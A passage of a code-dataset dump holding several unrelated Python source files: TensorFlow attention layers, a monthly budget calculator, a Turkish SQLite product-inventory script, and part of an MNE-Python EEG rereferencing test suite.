[batch_size, len_2, att_dim])\n\n atten_b = tf.get_variable(\"atten_b\", [att_dim], dtype=tf.float32)\n atten_v = tf.get_variable(\"atten_v\", [1, att_dim], dtype=tf.float32)\n atten_value_1 = tf.expand_dims(atten_value_1, axis=2, name=\"atten_value_1\") # [batch_size, len_1, 'x', feature_dim]\n atten_value_2 = tf.expand_dims(atten_value_2, axis=1, name=\"atten_value_2\") # [batch_size, 'x', len_2, feature_dim]\n atten_value = atten_value_1 + atten_value_2 # + tf.expand_dims(tf.expand_dims(tf.expand_dims(atten_b, axis=0), axis=0), axis=0)\n atten_value = nn_ops.bias_add(atten_value, atten_b)\n atten_value = tf.tanh(atten_value) # [batch_size, len_1, len_2, feature_dim]\n atten_value = tf.reshape(atten_value, [-1, att_dim]) * atten_v # tf.expand_dims(atten_v, axis=0) # [batch_size*len_1*len_2, feature_dim]\n atten_value = tf.reduce_sum(atten_value, axis=-1)\n atten_value = tf.reshape(atten_value, [batch_size, len_1, len_2])\n elif att_type == 'symmetric':\n atten_value_1 = tf.nn.relu(atten_value_1) # [batch_size*len1, att_dim]\n atten_value_2 = tf.nn.relu(atten_value_2) # [batch_size*len2, att_dim]\n D_in = tf.get_variable(\"diagonal_{}\".format(scope_name), [att_dim], dtype=tf.float32) # att_dim\n D = D_in * tf.diag(tf.ones([att_dim], tf.float32), name='diagonal') # att_dim xatt_dim\n atten_value_1 = tf.matmul(atten_value_1, D) # [batch_size*len1, att_dim]\n atten_value_1 = tf.reshape(atten_value_1, [batch_size, len_1, att_dim])\n atten_value_2 = tf.reshape(atten_value_2, [batch_size, len_2, att_dim])\n atten_value = tf.matmul(atten_value_1, atten_value_2, transpose_b=True) # [batch_size, len_1, len_2]\n elif att_type == 'cosine':\n atten_value_1 = tf.nn.relu(atten_value_1) # [batch_size*len1, att_dim]\n atten_value_2 = tf.nn.relu(atten_value_2) # [batch_size*len2, att_dim]\n atten_value_1 = tf.reshape(atten_value_1, [batch_size, len_1, att_dim])\n atten_value_2 = tf.reshape(atten_value_2, [batch_size, len_2, att_dim])\n atten_value = cal_relevancy_matrix(atten_value_2, atten_value_1)\n atten_value = atten_value * cosine_attention_scale\n else:\n atten_value_1 = tf.tanh(atten_value_1)\n # atten_value_1 = tf.nn.relu(atten_value_1)\n atten_value_2 = tf.tanh(atten_value_2)\n # atten_value_2 = tf.nn.relu(atten_value_2)\n diagnoal_params = tf.get_variable(\"diagonal_params\", [att_dim], dtype=tf.float32)\n atten_value_1 = atten_value_1 * tf.expand_dims(diagnoal_params, axis=0)\n atten_value_1 = tf.reshape(atten_value_1, [batch_size, len_1, att_dim])\n atten_value_2 = tf.reshape(atten_value_2, [batch_size, len_2, att_dim])\n atten_value = tf.matmul(atten_value_1, atten_value_2, transpose_b=True) # [batch_size, len_1, len_2]\n\n if remove_diagnoal:\n diagnoal = tf.ones([len_1], tf.float32) # [len1]\n diagnoal = 1.0 - tf.diag(diagnoal) # [len1, len1]\n diagnoal = tf.expand_dims(diagnoal, axis=0) # ['x', len1, len1]\n atten_value = atten_value * diagnoal\n if mask1 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask1, axis=-1))\n if mask2 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask2, axis=1))\n # normalize\n # atten_value = tf.nn.softmax(atten_value, name='atten_value') # [batch_size, len_1, len_2]\n atten_value = softmax_with_mask(atten_value, tf.expand_dims(mask2, axis=1))\n if remove_diagnoal: atten_value = atten_value * diagnoal\n if mask1 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask1, axis=-1))\n if mask2 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask2, axis=1))\n\n return atten_value\n\ndef fusion_attention_amit(in_value_1, in_value_2, feature_dim1, feature_dim2, scope_name='att',\n att_type='symmetric', att_dim=250, remove_diagnoal=False, mask1=None, mask2=None, is_training=False, dropout_rate=0.2):\n# def fusion_attention_amit(scope_name, in_q_rep, in_p_rep, w_dim1, w_dim2,\n# reuse=False, is_training=None, options=None, remove_diagnoal=False):\n input_shape = tf.shape(in_value_2)\n batch_size = input_shape[0]\n question_len = input_shape[1]\n passage_len = tf.shape(in_value_1)[1]\n with tf.variable_scope(scope_name, reuse=False):\n q_rep = dropout_layer(in_value_2, dropout_rate, is_training=is_training)\n p_rep = dropout_layer(in_value_1, dropout_rate, is_training=is_training)\n\n w_wordlevel = tf.get_variable(\"famf_highlevel_{}\".format(scope_name), [feature_dim1, att_dim],\n dtype=tf.float32) # D1 x D2\n q_rep = tf.reshape(q_rep, [-1, feature_dim1], name='BQ_dim1') # [B * Q, D1]\n\n q_rep = tf.matmul(q_rep, w_wordlevel) # [B * Q, D2]\n q_rep = tf.nn.relu(q_rep) # [B * Q, D2]\n\n D_in = tf.get_variable(\"diagonal_{}\".format(scope_name), [att_dim],\n dtype=tf.float32) # D1 x D2\n D = D_in * tf.diag(tf.ones([att_dim], tf.float32), name='diagonal') # D2 x D2\n q_rep = tf.matmul(q_rep, D) # f(Ux) D # [B * Q, D2]\n\n q_rep = tf.reshape(q_rep, [batch_size, question_len, att_dim],name='B_Q_dim2') # [B, Q, D2]\n\n\n p_rep = tf.reshape(p_rep, [-1, feature_dim1],name='BP_dim1') # [B * P, D1]\n p_rep = tf.matmul(p_rep, w_wordlevel) # [B * P, D2]\n p_rep = tf.nn.relu(p_rep) # f(Uy) # [B * P, D2]\n p_rep = tf.reshape(p_rep, [batch_size, passage_len,att_dim],name='B_P_dim2') # [B, P, D2]\n\n # passage: B x P x D2\n # question: B x Q x D2\n shuffled = tf.transpose(q_rep, perm=[0, 2, 1]) # B x D2 x Q\n\n # similarity between passage and query\n S_q_p = tf.matmul(p_rep, shuffled) # B x P x Q\n\n alphas = tf.nn.softmax(S_q_p) # B x P x Q\n return alphas\n\n # expanded_alphas = tf.expand_dims(alphas, axis=-1) # [ B , P , Q , 'x']\n # weighted_query = tf.expand_dims(query_rep, axis=1) # [B, 'x', Q, D1]\n # weighted_query = tf.reduce_sum(tf.multiply(weighted_query, expanded_alphas), axis=2) # [B, P, D1]\n # return weighted_query\n\n\ndef weighted_sum(atten_scores, in_values):\n '''\n\n :param atten_scores: # [batch_size, len1, len2]\n :param in_values: [batch_size, len2, dim]\n :return:\n '''\n return tf.matmul(atten_scores, in_values)\n\ndef cal_relevancy_matrix(in_question_repres, in_passage_repres):\n in_question_repres_tmp = tf.expand_dims(in_question_repres, 1) # [batch_size, 1, question_len, dim]\n in_passage_repres_tmp = tf.expand_dims(in_passage_repres, 2) # [batch_size, passage_len, 1, dim]\n relevancy_matrix = cosine_distance(in_question_repres_tmp,in_passage_repres_tmp) # [batch_size, passage_len, question_len]\n return relevancy_matrix\n\ndef mask_relevancy_matrix(relevancy_matrix, question_mask, passage_mask):\n # relevancy_matrix: [batch_size, passage_len, question_len]\n # question_mask: [batch_size, question_len]\n # passage_mask: [batch_size, passsage_len]\n if question_mask is not None:\n relevancy_matrix = tf.multiply(relevancy_matrix, tf.expand_dims(question_mask, 1))\n relevancy_matrix = tf.multiply(relevancy_matrix, tf.expand_dims(passage_mask, 2))\n return relevancy_matrix\n\ndef compute_gradients(tensor, var_list):\n grads = tf.gradients(tensor, var_list)\n return [grad if grad is not None else tf.zeros_like(var) for var, grad in zip(var_list, grads)]\n","repo_name":"freesunshine0316/MHQA","sub_path":"src/layer_utils.py","file_name":"layer_utils.py","file_ext":"py","file_size_in_byte":21533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72138007414","text":"from db import BudgetRepo\nimport datetime\nimport calendar\n\nclass Status:\n Create = \"Create Success\"\n Update = \"Update Success\"\n MonthErr = \"Error: Month should be between 1~12\"\n AmountIsNegative = \"Error: Amount should not be negative value\"\n\nclass Budget_Manager:\n\n def __init__(self):\n self.db = BudgetRepo()\n\n\n def Add_budget(self, Date, Amount):\n if int(Date[-2:]) > 12 or int(Date[-2:]) < 1:\n return Status.MonthErr\n if int(Amount) < 0:\n return Status.AmountIsNegative\n\n if self.db.is_budget_exists(Date) is True:\n self.db.replace_budget(Date, Amount)\n return Status.Update\n else:\n self.db.insert_budget(Date, Amount)\n return Status.Create\n\n def totalAmount(self, Start:datetime.datetime , End:datetime.datetime):\n BudgetDict = self.db.Get_All( )\n\n total_amount = 0.00\n\n if not BudgetDict:\n return total_amount\n\n\n\n budget_per_day_dict = {}\n\n for year_month in BudgetDict:\n month_budget = BudgetDict[year_month]\n year_month = str(year_month)\n year = int(year_month[0: 4])\n month = int(year_month[4:])\n days_of_month = calendar.monthrange(year, month)[1]\n\n budget_per_day = month_budget / days_of_month\n budget_per_day_dict[year_month] = budget_per_day\n\n for dt in daterange(Start, End):\n year_month = dt.strftime('%Y%m')\n if year_month not in budget_per_day_dict:\n continue\n total_amount += budget_per_day_dict[year_month]\n\n return total_amount\n\n\ndef daterange(date1, date2):\n for n in range(int ((date2 - date1).days)+1):\n yield date1 + datetime.timedelta(n)","repo_name":"cynthiaszchen/BudgetAdding","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16466351105","text":"import sqlite3\n\nclass Veri_Tabani(): #Veri tabani adi altinda bir class olusturdum.\n def __init__(self):\n\n self.baglanti_olustur() #baglanti_olustur adinda bir method tanimladim.\n\n\n\n def baglanti_olustur(self): #veri tabani ve tablo olusturdum.\n self.baglanti=sqlite3.connect(\"Urun_Bilgileri.db\") #Urun_Bilgileri adi altinda bir veri tabani olusturdum.\n self.cursor=self.baglanti.cursor() #imleci tanimaldim.\n self.cursor.execute(\"CREATE TABLE IF NOT EXISTS Bilgiler( AD TEXT, URETİM TEXT, STT TEXT, GRAMAJ INT)\")#tablo olusturdum\n self.baglanti.commit()#tabloyu veri tabanina bagladim.\n\n def baglanti_kes(self): #Veri tabani ile olan baglantiyi kesmek icin.\n self.baglanti.close()\n\n def urun_gir(self): #Database'e urun eklemek icin olusturdugum fonksiyon.\n self.ad=input(\"Ürün adi giriniz=\")\n self.uretim_tarihi=input(\"Ürünün üretim tarihini giriniz=\")\n self.stt=input(\"Ürünün son tüketim tarihini giriniz=\")\n self.gram=int(input(\"Ürünün gramini giriniz=\"))\n\n self.cursor.execute(\"INSERT INTO Bilgiler VALUES(?,?,?,?)\",(self.ad,self.uretim_tarihi,self.stt,self.gram))\n self.baglanti.commit()#sorgumu db'de calistirdim.\n\n def tum_urunleri_goster(self): #Veri tabanimda hangi urunlerin oldugunu gosteren fonksiyonum.\n self.cursor.execute(\"SELECT * FROM Bilgiler\")\n liste=self.cursor.fetchall()\n print(liste)\n\n def urun_sil(self): #Istenilen urunu komple silmeye yarar. Yani urune dair tum bilgileri silmek icin olusturdugum fonk.\n self.isim=input(\"Database'den silmek istediginiz ürün adini giriniz=\")\n self.cursor.execute(\"DELETE FROM Bilgiler where AD=?\",(self.isim,))#en sona virgül atma sebebimiz demet seklinde tutuldugu icin veri.(?)\n self.baglanti.commit()\n\n\n def urun_guncelle(self):#Urun guncellemek icin olusturdugum fonksiyon.\n self.cursor.execute(\"SELECT * FROM Bilgiler\")\n liste=self.cursor.fetchall()\n for i in liste:\n a=i[0]\n b=i[1]\n c=i[2]#guncellemek istedigim verinin adini aldim.\n d=i[3]\n\n\n print(\"Ürünün neyini guncellemek istiyorsunuz?\")\n print(\"1-Adini=\\n 2-Uretim Tarihini=\\n 3-STT=\\n 4-Urunun Gramini=\")\n islem=input(\"Bir islem seciniz=\")\n if(islem==\"1\"):\n self.a = input(\"Guncellemek istediginiz urun adini giriniz=\")\n self.yeni_ad = input(\"Yeni ürün adini giriniz=\")\n self.cursor.execute(\"UPDATE Bilgiler SET AD=? WHERE AD=?\", (self.yeni_ad, self.a))\n self.baglanti.commit()\n\n\n elif(islem==\"2\"):\n self.b = input(\"Guncellemek istediginiz urun uretim tarihini giriniz=\")\n self.yeni_tarih = input(\"Yeni ürün URETİM TARİHİNİ giriniz=\")\n self.cursor.execute(\"UPDATE Bilgiler SET URETİM=? WHERE URETİM=?\", (self.yeni_tarih, self.b))\n self.baglanti.commit()\n\n elif(islem==\"3\"):\n self.c = input(\"Guncellemek istediginiz urunun STT giriniz=\")\n self.yeni_stt= input(\"Yeni ürün STT giriniz=\")\n self.cursor.execute(\"UPDATE Bilgiler SET STT=? WHERE STT=?\", (self.yeni_stt, self.c))\n self.baglanti.commit()\n\n elif(islem==\"4\"):\n self.d = input(\"Guncellemek istediginiz urun gramajini giriniz=\")\n self.yeni_gram = input(\"Yeni ürün GRAMİNİ giriniz=\")\n self.cursor.execute(\"UPDATE Bilgiler SET GRAMAJ=? WHERE GRAMAJ=?\", (self.yeni_gram, self.d))\n self.baglanti.commit()\n\n\nobje=Veri_Tabani() #Veri_Tabani adli calss'imdan obje adinda bi obje olusutrdum ve bu objemin methodlarini diger yerde kulanabilmke icin.\n\n","repo_name":"tiskayaozgur/Market-Data-Storage","sub_path":"Classlar.py","file_name":"Classlar.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73034924533","text":"# Authors: Marijn van Vliet \n# Alexandre Gramfort \n# Teon Brooks \n#\n# License: BSD (3-clause)\n\nimport warnings\nimport os.path as op\nimport numpy as np\n\nfrom nose.tools import assert_true, assert_equal, assert_raises\nfrom numpy.testing import assert_array_equal, assert_allclose\n\nfrom mne import (pick_channels, pick_types, Epochs, read_events,\n set_eeg_reference, set_bipolar_reference,\n add_reference_channels)\nfrom mne.epochs import BaseEpochs\nfrom mne.io import read_raw_fif\nfrom mne.io.constants import FIFF\nfrom mne.io.proj import _has_eeg_average_ref_proj, Projection\nfrom mne.io.reference import _apply_reference\nfrom mne.datasets import testing\nfrom mne.utils import run_tests_if_main\n\nwarnings.simplefilter('always') # enable b/c these tests throw warnings\n\ndata_dir = op.join(testing.data_path(download=False), 'MEG', 'sample')\nfif_fname = op.join(data_dir, 'sample_audvis_trunc_raw.fif')\neve_fname = op.join(data_dir, 'sample_audvis_trunc_raw-eve.fif')\nave_fname = op.join(data_dir, 'sample_audvis_trunc-ave.fif')\n\n\ndef _test_reference(raw, reref, ref_data, ref_from):\n \"\"\"Test whether a reference has been correctly applied.\"\"\"\n # Separate EEG channels from other channel types\n picks_eeg = pick_types(raw.info, meg=False, eeg=True, exclude='bads')\n picks_other = pick_types(raw.info, meg=True, eeg=False, eog=True,\n stim=True, exclude='bads')\n\n # Calculate indices of reference channesl\n picks_ref = [raw.ch_names.index(ch) for ch in ref_from]\n\n # Get data\n _data = raw._data\n _reref = reref._data\n\n # Check that the ref has been properly computed\n if ref_data is not None:\n assert_array_equal(ref_data, _data[..., picks_ref, :].mean(-2))\n\n # Get the raw EEG data and other channel data\n raw_eeg_data = _data[..., picks_eeg, :]\n raw_other_data = _data[..., picks_other, :]\n\n # Get the rereferenced EEG data\n reref_eeg_data = _reref[..., picks_eeg, :]\n reref_other_data = _reref[..., picks_other, :]\n\n # Check that non-EEG channels are untouched\n assert_allclose(raw_other_data, reref_other_data, 1e-6, atol=1e-15)\n\n # Undo rereferencing of EEG channels if possible\n if ref_data is not None:\n if isinstance(raw, BaseEpochs):\n unref_eeg_data = reref_eeg_data + ref_data[:, np.newaxis, :]\n else:\n unref_eeg_data = reref_eeg_data + ref_data\n assert_allclose(raw_eeg_data, unref_eeg_data, 1e-6, atol=1e-15)\n\n\n@testing.requires_testing_data\ndef test_apply_reference():\n \"\"\"Test base function for rereferencing.\"\"\"\n raw = read_raw_fif(fif_fname, preload=True)\n\n # Rereference raw data by creating a copy of original data\n reref, ref_data = _apply_reference(\n raw.copy(), ref_from=['EEG 001', 'EEG 002'])\n assert_true(reref.info['custom_ref_applied'])\n _test_reference(raw, reref, ref_data, ['EEG 001', 'EEG 002'])\n\n # The CAR reference projection should have been removed by the function\n assert_true(not _has_eeg_average_ref_proj(reref.info['projs']))\n\n # Test that disabling the reference does not break anything\n reref, ref_data = _apply_reference(raw, [])\n assert_array_equal(raw._data, reref._data)\n\n # Test that data is modified in place when copy=False\n reref, ref_data = _apply_reference(raw, ['EEG 001', 'EEG 002'])\n assert_true(raw is reref)\n\n # Test re-referencing Epochs object\n raw = read_raw_fif(fif_fname, preload=False)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True)\n reref, ref_data = _apply_reference(\n epochs.copy(), ref_from=['EEG 001', 'EEG 002'])\n assert_true(reref.info['custom_ref_applied'])\n _test_reference(epochs, reref, ref_data, ['EEG 001', 'EEG 002'])\n\n # Test re-referencing Evoked object\n evoked = epochs.average()\n reref, ref_data = _apply_reference(\n evoked.copy(), ref_from=['EEG 001', 'EEG 002'])\n assert_true(reref.info['custom_ref_applied'])\n _test_reference(evoked, reref, ref_data, ['EEG 001', 'EEG 002'])\n\n # Referencing needs data to be preloaded\n raw_np = read_raw_fif(fif_fname, preload=False)\n assert_raises(RuntimeError, _apply_reference, raw_np, ['EEG 001'])\n\n # Test having inactive SSP projections that deal with channels involved\n # during re-referencing\n raw = read_raw_fif(fif_fname, preload=True)\n raw.add_proj(\n Projection(\n active=False,\n data=dict(\n col_names=['EEG 001', 'EEG 002'],\n row_names=None,\n data=[[1, 1]],\n ncol=2,\n nrow=1\n ),\n desc='test',\n kind=1,\n )\n )\n # Projection concerns channels mentioned in projector\n assert_raises(RuntimeError, _apply_reference, raw, ['EEG 001'])\n\n # Projection does not concern channels mentioned in projector, no error\n _apply_reference(raw, ['EEG 003'], ['EEG 004'])\n\n\n@testing.requires_testing_data\ndef test_set_eeg_reference():\n \"\"\"Test rereference eeg data.\"\"\"\n raw = read_raw_fif(fif_fname, preload=True)\n raw.info['projs'] = []\n\n # Test setting an average reference\n assert_true(not _has_eeg_average_ref_proj(raw.info['projs']))\n reref, ref_data = set_eeg_reference(raw)\n assert_true(_has_eeg_average_ref_proj(reref.info['projs']))\n assert_true(not reref.info['projs'][0]['active'])\n assert_true(ref_data is None)\n reref.apply_proj()\n eeg_chans = [raw.ch_names[ch]\n for ch in pick_types(raw.info, meg=False, eeg=True)]\n _test_reference(raw, reref, ref_data,\n [ch for ch in eeg_chans if ch not in raw.info['bads']])\n\n # Test setting an average reference when one was already present\n with warnings.catch_warnings(record=True):\n reref, ref_data = set_eeg_reference(raw, copy=False)\n assert_true(ref_data is None)\n\n # Test setting an average reference on non-preloaded data\n raw_nopreload = read_raw_fif(fif_fname, preload=False)\n raw_nopreload.info['projs'] = []\n reref, ref_data = set_eeg_reference(raw_nopreload)\n assert_true(_has_eeg_average_ref_proj(reref.info['projs']))\n assert_true(not reref.info['projs'][0]['active'])\n\n # Rereference raw data by creating a copy of original data\n reref, ref_data = set_eeg_reference(raw, ['EEG 001', 'EEG 002'], copy=True)\n assert_true(reref.info['custom_ref_applied'])\n _test_reference(raw, reref, ref_data, ['EEG 001', 'EEG 002'])\n\n # Test that data is modified in place when copy=False\n reref, ref_data = set_eeg_reference(raw, ['EEG 001', 'EEG 002'],\n copy=False)\n assert_true(raw is reref)\n\n # Test moving from custom to average reference\n reref, ref_data = set_eeg_reference(raw, ['EEG 001', 'EEG 002'])\n reref, _ = set_eeg_reference(reref)\n assert_true(_has_eeg_average_ref_proj(reref.info['projs']))\n assert_equal(reref.info['custom_ref_applied'], False)\n\n # When creating an average reference fails, make sure the\n # custom_ref_applied flag remains untouched.\n reref = raw.copy()\n reref.info['custom_ref_applied'] = True\n reref.pick_types(eeg=False) # Cause making average ref fail\n assert_raises(ValueError, set_eeg_reference, reref)\n assert_true(reref.info['custom_ref_applied'])\n\n # Test moving from average to custom reference\n reref, ref_data = set_eeg_reference(raw)\n reref, _ = set_eeg_reference(reref, ['EEG 001', 'EEG 002'])\n assert_true(not _has_eeg_average_ref_proj(reref.info['projs']))\n assert_equal(reref.info['custom_ref_applied'], True)\n\n\n@testing.requires_testing_data\ndef test_set_bipolar_reference():\n \"\"\"Test bipolar referencing.\"\"\"\n raw = read_raw_fif(fif_fname, preload=True)\n raw.apply_proj()\n\n reref = set_bipolar_reference(raw, 'EEG 001', 'EEG 002', 'bipolar',\n {'kind': FIFF.FIFFV_EOG_CH,\n 'extra': 'some extra value'})\n assert_true(reref.info['custom_ref_applied'])\n\n # Compare result to a manual calculation\n a = raw.copy().pick_channels(['EEG 001', 'EEG 002'])\n a = a._data[0, :] - a._data[1, :]\n b = reref.copy().pick_channels(['bipolar'])._data[0, :]\n assert_allclose(a, b)\n\n # Original channels should be replaced by a virtual one\n assert_true('EEG 001' not in reref.ch_names)\n assert_true('EEG 002' not in reref.ch_names)\n assert_true('bipolar' in reref.ch_names)\n\n # Check channel information\n bp_info = reref.info['chs'][reref.ch_names.index('bipolar')]\n an_info = reref.info['chs'][raw.ch_names.index('EEG 001')]\n for key in bp_info:\n if key == 'loc':\n assert_array_equal(bp_info[key], 0)\n elif key == 'coil_type':\n assert_equal(bp_info[key], FIFF.FIFFV_COIL_EEG_BIPOLAR)\n elif key == 'kind':\n assert_equal(bp_info[key], FIFF.FIFFV_EOG_CH)\n else:\n assert_equal(bp_info[key], an_info[key])\n assert_equal(bp_info['extra'], 'some extra value')\n\n # Minimalist call\n reref = set_bipolar_reference(raw, 'EEG 001', 'EEG 002')\n assert_true('EEG 001-EEG 002' in reref.ch_names)\n\n # Set multiple references at once\n reref = set_bipolar_reference(\n raw,\n ['EEG 001', 'EEG 003'],\n ['EEG 002', 'EEG 004'],\n ['bipolar1', 'bipolar2'],\n [{'kind': FIFF.FIFFV_EOG_CH, 'extra': 'some extra value'},\n {'kind': FIFF.FIFFV_EOG_CH, 'extra': 'some extra value'}],\n )\n a = raw.copy().pick_channels(['EEG 001', 'EEG 002', 'EEG 003', 'EEG 004'])\n a = np.array([a._data[0, :] - a._data[1, :],\n a._data[2, :] - a._data[3, :]])\n b = reref.copy().pick_channels(['bipolar1', 'bipolar2'])._data\n assert_allclose(a, b)\n\n # Test creating a bipolar reference that doesn't involve EEG channels:\n # it should not set the custom_ref_applied flag\n reref = set_bipolar_reference(raw, 'MEG 0111', 'MEG 0112',\n ch_info={'kind': FIFF.FIFFV_MEG_CH})\n assert_true(not reref.info['custom_ref_applied'])\n assert_true('MEG 0111-MEG 0112' in reref.ch_names)\n\n # Test a battery of invalid inputs\n assert_raises(ValueError, set_bipolar_reference, raw,\n 'EEG 001', ['EEG 002', 'EEG 003'], 'bipolar')\n assert_raises(ValueError, set_bipolar_reference, raw,\n ['EEG 001', 'EEG 002'], 'EEG 003', 'bipolar')\n assert_raises(ValueError, set_bipolar_reference, raw,\n 'EEG 001', 'EEG 002', ['bipolar1', 'bipolar2'])\n assert_raises(ValueError, set_bipolar_reference, raw,\n 'EEG 001', 'EEG 002', 'bipolar',\n ch_info=[{'foo': 'bar'}, {'foo': 'bar'}])\n assert_raises(ValueError, set_bipolar_reference, raw,\n 'EEG 001', 'EEG 002', ch_name='EEG 003')\n\n\ndef _check_channel_names(inst, ref_names):\n \"\"\"Check channel names.\"\"\"\n if isinstance(ref_names, str):\n ref_names = [ref_names]\n\n # Test that the names of the reference channels are present in `ch_names`\n ref_idx = pick_channels(inst.info['ch_names'], ref_names)\n assert_true(len(ref_idx), len(ref_names))\n\n # Test that the names of the reference channels are present in the `chs`\n # list\n inst.info._check_consistency() # Should raise no exceptions\n\n\n@testing.requires_testing_data\ndef test_add_reference():\n \"\"\"Test adding a reference.\"\"\"\n raw = read_raw_fif(fif_fname, preload=True)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n # check if channel already exists\n assert_raises(ValueError, add_reference_channels,\n raw, raw.info['ch_names'][0])\n # add reference channel to Raw\n raw_ref = add_reference_channels(raw, 'Ref', copy=True)\n assert_equal(raw_ref._data.shape[0], raw._data.shape[0] + 1)\n assert_array_equal(raw._data[picks_eeg, :], raw_ref._data[picks_eeg, :])\n _check_channel_names(raw_ref, 'Ref')\n\n orig_nchan = raw.info['nchan']\n raw = add_reference_channels(raw, 'Ref', copy=False)\n assert_array_equal(raw._data, raw_ref._data)\n assert_equal(raw.info['nchan'], orig_nchan + 1)\n _check_channel_names(raw, 'Ref')\n\n # for Neuromag fif's, the reference electrode location is placed in\n # elements [3:6] of each \"data\" electrode location\n assert_allclose(raw.info['chs'][-1]['loc'][:3],\n raw.info['chs'][picks_eeg[0]]['loc'][3:6], 1e-6)\n\n ref_idx = raw.ch_names.index('Ref')\n ref_data, _ = raw[ref_idx]\n assert_array_equal(ref_data, 0)\n\n # add reference channel to Raw when no digitization points exist\n raw = read_raw_fif(fif_fname).crop(0, 1).load_data()\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n del raw.info['dig']\n\n raw_ref = add_reference_channels(raw, 'Ref', copy=True)\n\n assert_equal(raw_ref._data.shape[0], raw._data.shape[0] + 1)\n assert_array_equal(raw._data[picks_eeg, :], raw_ref._data[picks_eeg, :])\n _check_channel_names(raw_ref, 'Ref')\n\n orig_nchan = raw.info['nchan']\n raw = add_reference_channels(raw, 'Ref', copy=False)\n assert_array_equal(raw._data, raw_ref._data)\n assert_equal(raw.info['nchan'], orig_nchan + 1)\n _check_channel_names(raw, 'Ref')\n\n # Test adding an existing channel as reference channel\n assert_raises(ValueError, add_reference_channels, raw,\n raw.info['ch_names'][0])\n\n # add two reference channels to Raw\n raw_ref = add_reference_channels(raw, ['M1', 'M2'], copy=True)\n _check_channel_names(raw_ref, ['M1', 'M2'])\n assert_equal(raw_ref._data.shape[0], raw._data.shape[0] + 2)\n assert_array_equal(raw._data[picks_eeg, :], raw_ref._data[picks_eeg, :])\n assert_array_equal(raw_ref._data[-2:, :], 0)\n\n raw = add_reference_channels(raw, ['M1', 'M2'], copy=False)\n _check_channel_names(raw, ['M1', 'M2'])\n ref_idx = raw.ch_names.index('M1')\n ref_idy = raw.ch_names.index('M2')\n ref_data, _ = raw[[ref_idx, ref_idy]]\n assert_array_equal(ref_data, 0)\n\n # add reference channel to epochs\n raw = read_raw_fif(fif_fname, preload=True)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True)\n # default: proj=True, after which adding a Ref channel is prohibited\n assert_raises(RuntimeError, add_reference_channels, epochs, 'Ref')\n\n # create epochs in delayed mode, allowing removal of CAR when re-reffing\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True, proj='delayed')\n epochs_ref = add_reference_channels(epochs, 'Ref', copy=True)\n\n assert_equal(epochs_ref._data.shape[1], epochs._data.shape[1] + 1)\n _check_channel_names(epochs_ref, 'Ref')\n ref_idx = epochs_ref.ch_names.index('Ref')\n ref_data = epochs_ref.get_data()[:, ref_idx, :]\n assert_array_equal(ref_data, 0)\n picks_eeg = pick_types(epochs.info, meg=False, eeg=True)\n assert_array_equal(epochs.get_data()[:, picks_eeg, :],\n epochs_ref.get_data()[:, picks_eeg, :])\n\n # add two reference channels to epochs\n raw = read_raw_fif(fif_fname, preload=True)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n # create epochs in delayed mode, allowing removal of CAR when re-reffing\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True, proj='delayed')\n with warnings.catch_warnings(record=True): # multiple set zero\n epochs_ref = add_reference_channels(epochs, ['M1', 'M2'], copy=True)\n assert_equal(epochs_ref._data.shape[1], epochs._data.shape[1] + 2)\n _check_channel_names(epochs_ref, ['M1', 'M2'])\n ref_idx = epochs_ref.ch_names.index('M1')\n ref_idy = epochs_ref.ch_names.index('M2')\n assert_equal(epochs_ref.info['chs'][ref_idx]['ch_name'], 'M1')\n assert_equal(epochs_ref.info['chs'][ref_idy]['ch_name'], 'M2')\n ref_data = epochs_ref.get_data()[:, [ref_idx, ref_idy], :]\n assert_array_equal(ref_data, 0)\n picks_eeg = pick_types(epochs.info, meg=False, eeg=True)\n assert_array_equal(epochs.get_data()[:, picks_eeg, :],\n epochs_ref.get_data()[:, picks_eeg, :])\n\n # add reference channel to evoked\n raw = read_raw_fif(fif_fname, preload=True)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n # create epochs in delayed mode, allowing removal of CAR when re-reffing\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True, proj='delayed')\n evoked = epochs.average()\n evoked_ref = add_reference_channels(evoked, 'Ref', copy=True)\n assert_equal(evoked_ref.data.shape[0], evoked.data.shape[0] + 1)\n _check_channel_names(evoked_ref, 'Ref')\n ref_idx = evoked_ref.ch_names.index('Ref')\n ref_data = evoked_ref.data[ref_idx, :]\n assert_array_equal(ref_data, 0)\n picks_eeg = pick_types(evoked.info, meg=False, eeg=True)\n assert_array_equal(evoked.data[picks_eeg, :],\n evoked_ref.data[picks_eeg, :])\n\n # add two reference channels to evoked\n raw = read_raw_fif(fif_fname, preload=True)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n # create epochs in delayed mode, allowing removal of CAR when re-reffing\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True, proj='delayed')\n evoked = epochs.average()\n with warnings.catch_warnings(record=True): # multiple set zero\n evoked_ref = add_reference_channels(evoked, ['M1', 'M2'], copy=True)\n assert_equal(evoked_ref.data.shape[0], evoked.data.shape[0] + 2)\n 